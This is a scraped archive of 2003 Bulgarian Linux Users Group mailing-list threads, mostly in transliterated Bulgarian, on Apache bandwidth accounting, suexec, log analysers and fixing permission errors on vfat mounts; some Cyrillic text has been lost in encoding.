http://sourceforge.net/projects/mod-acct/. mod_accounting is a simple Apache module that can record traffic statistics into a database (bytes in/out per http request). query . HTH, Stratsimir Yavor Shahpasov wrote: Znae li niakoi lesen nachin za sledene na bandwith za apache. I ama niakolko servera s mnogo vhosts. Bih iska da znam a) koi v hosts kolko galta b) koi urls lapat nai mnogo bandwith i drugi podobni neshta. Da se polzva log analizers e nemislimo za tozi sluchai A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: Apache Bandwith
On Monday 20 October 2003 17:54, Yavor Shahpasov wrote: - - - Da se polzva log analizers e nemislimo za tozi sluchai ? A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
lug-bg: Apache Bandwith
Znae li niakoi lesen nachin za sledene na bandwith za apache. I ama niakolko servera s mnogo vhosts. Bih iska da znam a) koi v hosts kolko galta b) koi urls lapat nai mnogo bandwith i drugi podobni neshta. Da se polzva log analizers e nemislimo za tozi sluchai -- Yavor Shahpasov [EMAIL PROTECTED] A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
lug-bg: Apache suexec
, . slackware , Apache 1.3.28+PHP-4.3.3+mysql-4.0.15. Apacheto--enable-suexec --suexec-caller=root. html , , Perl script.GCI.pm , mount- (Vision FS(Sco Unix:-()). mount Apacheto: cp: cannot create regular file `/mnt/alabala/alabala.txt': Permission denied root mount pointa rw. , CGI root . system . 50Shell SMART - http://www.shell.bg A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: Apache suexec
,, (-rwxrwxrwx), erro loga Permission denied.:-( .. ... , A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
lug-bg: apache log analyser webcounter
Zdraveite grupa Imam slednoto pitane. Tarsia apache log analyser ili neshto ot tozi sort koeto da mi vadi vsichkoot logovete na apacheto.Sashto taka akoznaete niakoia systema za webcounter. Blagodaria vi mnogo predvaritelno na vsichki lek den i priatel weekend. Krasimir Kovachki
Re: lug-bg: apache log analyser webcounter
Webalizer , - less :-) [EMAIL PROTECTED] wrote: Zdraveite grupa Imam slednoto pitane. Tarsia apache log analyser ili neshto ot tozi sort koeto da mi vadi vsichko ot logovete na apacheto. Sashto taka ako znaete niakoia systema za webcounter. Blagodaria vi mnogo predvaritelno na vsichki lek den i priatel weekend. Krasimir Kovachki -- Regards: Romeo Ninov A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: apache i vfat
On Wed, 02 Jul 2003 13:39:15 + Elin [EMAIL PROTECTED] wrote: client 192.168.1.1] (13)Permission denied: /home/htdocs/hdd4/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable ~ Proveri dali user-a na apacha mozhe ima r-x na /home, /home/htdocs, /home/htdocs/hdd4 i r-- na /home/htdocs/hdd4/.htaccess. Za da probvash kade se pracakva: stavash root $ su ... pass... stavash apache # su -s /bin/sh www-data $ cd /home $ cd htdocs $ cd hdd4 $ cat .htaccess i shte vidish tochno kade e problema. www-data tryabva da se zamesti s user-a na apacha. dam -- Damyan Ivanov Creditreform Bulgaria [EMAIL PROTECTED] http://www.creditreform.bg/ phone: +359 2 928 2611, 929 3993 fax: +359 2 920 0994 mobile: +359 88 566067 ICQ: 3028500 pgp0.pgp Description: PGP signature
Re: lug-bg: apache i vfat
On Wed, 02 Jul 2003 14:02:05 + Elin [EMAIL PROTECTED] wrote: Damyan Ivanov wrote: On Wed, 02 Jul 2003 11:26:02 + Elin [EMAIL PROTECTED] wrote: imam slednia problem s apache 1.3.27 mountvam partishani koito sa vfatv root dirktoriata na apche i kato se opitvam da gi brouzvam mi dava forbiden access problema e che nemoga da pipam premishanite na vfata a staroto mi apache niamashe nikav problem po tova otnoshenie ako niako moze da pomogne she sam blagodaren Montiray s opciya uid=neshto kato neshto e user-a, na apacha. taka stana mnogo 10x no s predishnoto apache si go mauntvah kato root s fstab da znaesh s fstab kak da mu ukaza da gi mountva s nego kato nobody slozhi uid=neshto v poleto za opcii v /etc/fstab. dam -- Damyan Ivanov Creditreform Bulgaria [EMAIL PROTECTED] http://www.creditreform.bg/ phone: +359 2 928 2611, 929 3993 fax: +359 2 920 0994 mobile: +359 88 566067 ICQ: 3028500 pgp0.pgp Description: PGP signature
lug-bg: apache i vfat
imam slednia problem s apache 1.3.27 mountvam partishani koito sa vfat v root dirktoriata na apche i kato se opitvam da gi brouzvam mi dava forbiden access problema e che nemoga da pipam premishanite na vfata a staroto mi apache niamashe nikav problem po tova otnoshenie ako niako moze da pomogne she sam blagodaren A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: apache i vfat
mount- fat -noexec. On Wed, 02 Jul 2003 11:26:02 + Elin [EMAIL PROTECTED] wrote: imam slednia problem s apache 1.3.27 mountvam partishani koito sa vfat v root dirktoriata na apche i kato se opitvam da gi brouzvam mi dava forbiden access problema e che nemoga da pipam premishanite na vfata a staroto mi apache niamashe nikav problem po tova otnoshenie ako niako moze da pomogne she sam blagodaren A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html -- Life is short - pray hard. Man is certainly stark mad: He cannot make a flea, yet he makes gods by the dozens. - Montaigne Public PGP key at: http://www.fadata.bg/pgp/micropgp.asc pgp0.pgp Description: PGP signature
Re: lug-bg: apache i vfat
Vig s kakvi User Group e varvialo staroto apache i gi slogi sashtite v httpd.conf na novoto. Vig sashto dali imash Options Indexes za Directory-to , koeto se optitvash da brouznesh. imam slednia problem s apache 1.3.27 mountvam partishani koito sa vfat v root dirktoriata na apche i kato se opitvam da gi brouzvam mi dava forbiden access problema e che nemoga da pipam premishanite na vfata a staroto mi apache niamashe nikav problem po tova otnoshenie ako niako moze da pomogne she sam blagodaren A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: apache i vfat
On Wed, 02 Jul 2003 11:26:02 + Elin [EMAIL PROTECTED] wrote: imam slednia problem s apache 1.3.27 mountvam partishani koito sa vfat v root dirktoriata na apche i kato se opitvam da gi brouzvam mi dava forbiden access problema e che nemoga da pipam premishanite na vfata a staroto mi apache niamashe nikav problem po tova otnoshenie ako niako moze da pomogne she sam blagodaren Montiray s opciya uid=neshto kato neshto e user-a, na apacha. dam -- Damyan Ivanov Creditreform Bulgaria [EMAIL PROTECTED] http://www.creditreform.bg/ phone: +359 2 928 2611, 929 3993 fax: +359 2 920 0994 mobile: +359 88 566067 ICQ: 3028500 pgp0.pgp Description: PGP signature
Re: lug-bg: apache i vfat
client 192.168.1.1] (13)Permission denied: /home/htdocs/hdd4/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable eto tova ima v log fila probvah da go mahna .htaccecc ot httpd.conf no pak mi skarva tova subshtenie sahto probvah i dago slozav direktoriata toia fail no pak nestana probvah i s Options Indexes no ne stavapak Georgi Chorbadzhiyski wrote: Elin wrote: imam slednia problem s apache 1.3.27 mountvam partishani koito sa vfat v root dirktoriata na apche i kato se opitvam da gi brouzvam mi dava forbiden access problema e che nemoga da pipam premishanite na vfata a staroto mi apache niamashe nikav problem po tova otnoshenie ako niako moze da pomogne she sam blagodaren Vav error_log pishe zashto niamash dostap. Nai-veroiatno pri smianata na apache si zabravil za tazi direktoria za koito imash problem da dobavish Options Indexes A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: apache i vfat
az kopirah izcialo staroto httpd.conf Emil Slavov wrote: Vig s kakvi User Group e varvialo staroto apache i gi slogi sashtite v httpd.conf na novoto. Vig sashto dali imash Options Indexes za Directory-to , koeto se optitvash da brouznesh. imam slednia problem s apache 1.3.27 mountvam partishani koito sa vfat v root dirktoriata na apche i kato se opitvam da gi brouzvam mi dava forbiden access problema e che nemoga da pipam premishanite na vfata a staroto mi apache niamashe nikav problem po tova otnoshenie ako niako moze da pomogne she sam blagodaren A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html